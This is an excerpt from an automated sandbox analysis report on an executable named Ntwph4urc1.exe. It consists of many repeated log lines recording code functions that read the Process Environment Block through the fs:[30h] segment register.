      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A116CC mov eax, dword ptr fs:[00000030h] 9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A116CC mov eax, dword ptr fs:[00000030h] 9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A116CC mov eax, dword ptr fs:[00000030h] 9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A116CC mov eax, dword ptr fs:[00000030h] 9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h] 9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h] 9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h] 9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h] 9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h] 9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h] 9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697D6E0 mov eax, dword ptr fs:[00000030h] 9_2_3697D6E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697D6E0 mov eax, dword ptr fs:[00000030h] 9_2_3697D6E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369836EF mov eax, dword ptr fs:[00000030h] 9_2_369836EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36953616 mov eax, dword ptr fs:[00000030h] 9_2_36953616
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36953616 mov eax, dword ptr fs:[00000030h] 9_2_36953616
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A25636 mov eax, dword ptr fs:[00000030h] 9_2_36A25636
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698F603 mov eax, dword ptr fs:[00000030h] 9_2_3698F603
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36981607 mov eax, dword ptr fs:[00000030h] 9_2_36981607
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h] 9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36989660 mov eax, dword ptr fs:[00000030h] 9_2_36989660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36989660 mov eax, dword ptr fs:[00000030h] 9_2_36989660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369ED660 mov eax, dword ptr fs:[00000030h] 9_2_369ED660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A237B6 mov eax, dword ptr fs:[00000030h] 9_2_36A237B6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697D7B0 mov eax, dword ptr fs:[00000030h] 9_2_3697D7B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A0F78A mov eax, dword ptr fs:[00000030h] 9_2_36A0F78A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h] 9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h] 9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h] 9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h] 9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h] 9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h] 9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D97A9 mov eax, dword ptr fs:[00000030h] 9_2_369D97A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369557C0 mov eax, dword ptr fs:[00000030h] 9_2_369557C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369557C0 mov eax, dword ptr fs:[00000030h] 9_2_369557C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369557C0 mov eax, dword ptr fs:[00000030h] 9_2_369557C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695D7E0 mov ecx, dword ptr fs:[00000030h] 9_2_3695D7E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698F71F mov eax, dword ptr fs:[00000030h] 9_2_3698F71F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698F71F mov eax, dword ptr fs:[00000030h] 9_2_3698F71F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A1972B mov eax, dword ptr fs:[00000030h] 9_2_36A1972B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A0F72E mov eax, dword ptr fs:[00000030h] 9_2_36A0F72E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36957703 mov eax, dword ptr fs:[00000030h] 9_2_36957703
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36955702 mov eax, dword ptr fs:[00000030h] 9_2_36955702
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36955702 mov eax, dword ptr fs:[00000030h] 9_2_36955702
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A2B73C mov eax, dword ptr fs:[00000030h] 9_2_36A2B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A2B73C mov eax, dword ptr fs:[00000030h] 9_2_36A2B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A2B73C mov eax, dword ptr fs:[00000030h] 9_2_36A2B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A2B73C mov eax, dword ptr fs:[00000030h] 9_2_36A2B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36949730 mov eax, dword ptr fs:[00000030h] 9_2_36949730
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36949730 mov eax, dword ptr fs:[00000030h] 9_2_36949730
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36985734 mov eax, dword ptr fs:[00000030h] 9_2_36985734
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695973A mov eax, dword ptr fs:[00000030h] 9_2_3695973A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695973A mov eax, dword ptr fs:[00000030h] 9_2_3695973A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36953720 mov eax, dword ptr fs:[00000030h] 9_2_36953720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F720 mov eax, dword ptr fs:[00000030h] 9_2_3696F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F720 mov eax, dword ptr fs:[00000030h] 9_2_3696F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F720 mov eax, dword ptr fs:[00000030h] 9_2_3696F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369F375F mov eax, dword ptr fs:[00000030h] 9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369F375F mov eax, dword ptr fs:[00000030h] 9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369F375F mov eax, dword ptr fs:[00000030h] 9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369F375F mov eax, dword ptr fs:[00000030h] 9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369F375F mov eax, dword ptr fs:[00000030h] 9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36963740 mov eax, dword ptr fs:[00000030h] 9_2_36963740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36963740 mov eax, dword ptr fs:[00000030h] 9_2_36963740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36963740 mov eax, dword ptr fs:[00000030h] 9_2_36963740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A23749 mov eax, dword ptr fs:[00000030h] 9_2_36A23749
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B765 mov eax, dword ptr fs:[00000030h] 9_2_3694B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B765 mov eax, dword ptr fs:[00000030h] 9_2_3694B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B765 mov eax, dword ptr fs:[00000030h] 9_2_3694B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B765 mov eax, dword ptr fs:[00000030h] 9_2_3694B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36959486 mov eax, dword ptr fs:[00000030h] 9_2_36959486
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36959486 mov eax, dword ptr fs:[00000030h] 9_2_36959486
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B480 mov eax, dword ptr fs:[00000030h] 9_2_3694B480
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369474B0 mov eax, dword ptr fs:[00000030h] 9_2_369474B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369474B0 mov eax, dword ptr fs:[00000030h] 9_2_369474B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369834B0 mov eax, dword ptr fs:[00000030h] 9_2_369834B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A254DB mov eax, dword ptr fs:[00000030h] 9_2_36A254DB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369F94E0 mov eax, dword ptr fs:[00000030h] 9_2_369F94E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D7410 mov eax, dword ptr fs:[00000030h] 9_2_369D7410
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697340D mov eax, dword ptr fs:[00000030h] 9_2_3697340D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FB450 mov eax, dword ptr fs:[00000030h] 9_2_369FB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FB450 mov eax, dword ptr fs:[00000030h] 9_2_369FB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FB450 mov eax, dword ptr fs:[00000030h] 9_2_369FB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FB450 mov eax, dword ptr fs:[00000030h] 9_2_369FB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h] 9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h] 9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h] 9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h] 9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h] 9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h] 9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A2547F mov eax, dword ptr fs:[00000030h] 9_2_36A2547F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A0F453 mov eax, dword ptr fs:[00000030h] 9_2_36A0F453
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36951460 mov eax, dword ptr fs:[00000030h] 9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36951460 mov eax, dword ptr fs:[00000030h] 9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36951460 mov eax, dword ptr fs:[00000030h] 9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36951460 mov eax, dword ptr fs:[00000030h] 9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36951460 mov eax, dword ptr fs:[00000030h] 9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h] 9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h] 9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h] 9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h] 9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h] 9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h] 9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369DB594 mov eax, dword ptr fs:[00000030h] 9_2_369DB594
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369DB594 mov eax, dword ptr fs:[00000030h] 9_2_369DB594
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694758F mov eax, dword ptr fs:[00000030h] 9_2_3694758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694758F mov eax, dword ptr fs:[00000030h] 9_2_3694758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694758F mov eax, dword ptr fs:[00000030h] 9_2_3694758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A0F5BE mov eax, dword ptr fs:[00000030h] 9_2_36A0F5BE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E35BA mov eax, dword ptr fs:[00000030h] 9_2_369E35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E35BA mov eax, dword ptr fs:[00000030h] 9_2_369E35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E35BA mov eax, dword ptr fs:[00000030h] 9_2_369E35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E35BA mov eax, dword ptr fs:[00000030h] 9_2_369E35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h] 9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369ED5B0 mov eax, dword ptr fs:[00000030h] 9_2_369ED5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369ED5B0 mov eax, dword ptr fs:[00000030h] 9_2_369ED5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h] 9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h] 9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h] 9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h] 9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h] 9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369CD5D0 mov eax, dword ptr fs:[00000030h] 9_2_369CD5D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369CD5D0 mov ecx, dword ptr fs:[00000030h] 9_2_369CD5D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369795DA mov eax, dword ptr fs:[00000030h] 9_2_369795DA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369855C0 mov eax, dword ptr fs:[00000030h] 9_2_369855C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h] 9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h] 9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h] 9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h] 9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h] 9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h] 9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A255C9 mov eax, dword ptr fs:[00000030h] 9_2_36A255C9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A235D7 mov eax, dword ptr fs:[00000030h] 9_2_36A235D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A235D7 mov eax, dword ptr fs:[00000030h] 9_2_36A235D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A235D7 mov eax, dword ptr fs:[00000030h] 9_2_36A235D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A0B52F mov eax, dword ptr fs:[00000030h] 9_2_36A0B52F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A25537 mov eax, dword ptr fs:[00000030h] 9_2_36A25537
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36987505 mov eax, dword ptr fs:[00000030h] 9_2_36987505
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36987505 mov ecx, dword ptr fs:[00000030h] 9_2_36987505
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h] 9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h] 9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h] 9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h] 9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h] 9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h] 9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698D530 mov eax, dword ptr fs:[00000030h] 9_2_3698D530
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698D530 mov eax, dword ptr fs:[00000030h] 9_2_3698D530
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h] 9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h] 9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h] 9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h] 9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h] 9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h] 9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h] 9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FB550 mov eax, dword ptr fs:[00000030h] 9_2_369FB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FB550 mov eax, dword ptr fs:[00000030h] 9_2_369FB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369FB550 mov eax, dword ptr fs:[00000030h] 9_2_369FB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698B570 mov eax, dword ptr fs:[00000030h] 9_2_3698B570
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698B570 mov eax, dword ptr fs:[00000030h] 9_2_3698B570
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B562 mov eax, dword ptr fs:[00000030h] 9_2_3694B562
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698329E mov eax, dword ptr fs:[00000030h] 9_2_3698329E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3698329E mov eax, dword ptr fs:[00000030h] 9_2_3698329E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A192A6 mov eax, dword ptr fs:[00000030h] 9_2_36A192A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A192A6 mov eax, dword ptr fs:[00000030h] 9_2_36A192A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A192A6 mov eax, dword ptr fs:[00000030h] 9_2_36A192A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A192A6 mov eax, dword ptr fs:[00000030h] 9_2_36A192A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A25283 mov eax, dword ptr fs:[00000030h] 9_2_36A25283
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D92BC mov eax, dword ptr fs:[00000030h] 9_2_369D92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D92BC mov eax, dword ptr fs:[00000030h] 9_2_369D92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D92BC mov ecx, dword ptr fs:[00000030h] 9_2_369D92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369D92BC mov ecx, dword ptr fs:[00000030h] 9_2_369D92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369652A0 mov eax, dword ptr fs:[00000030h] 9_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369652A0 mov eax, dword ptr fs:[00000030h] 9_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369652A0 mov eax, dword ptr fs:[00000030h] 9_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369652A0 mov eax, dword ptr fs:[00000030h] 9_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E72A0 mov eax, dword ptr fs:[00000030h] 9_2_369E72A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_369E72A0 mov eax, dword ptr fs:[00000030h] 9_2_369E72A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_36A252E2 mov eax, dword ptr fs:[00000030h] 9_2_36A252E2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F2D0 mov eax, dword ptr fs:[00000030h] 9_2_3697F2D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3697F2D0 mov eax, dword ptr fs:[00000030h] 9_2_3697F2D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B2D3 mov eax, dword ptr fs:[00000030h] 9_2_3694B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B2D3 mov eax, dword ptr fs:[00000030h] 9_2_3694B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe Code function: 9_2_3694B2D3 mov eax, dword ptr fs:[00000030h] 9_2_3694B2D3
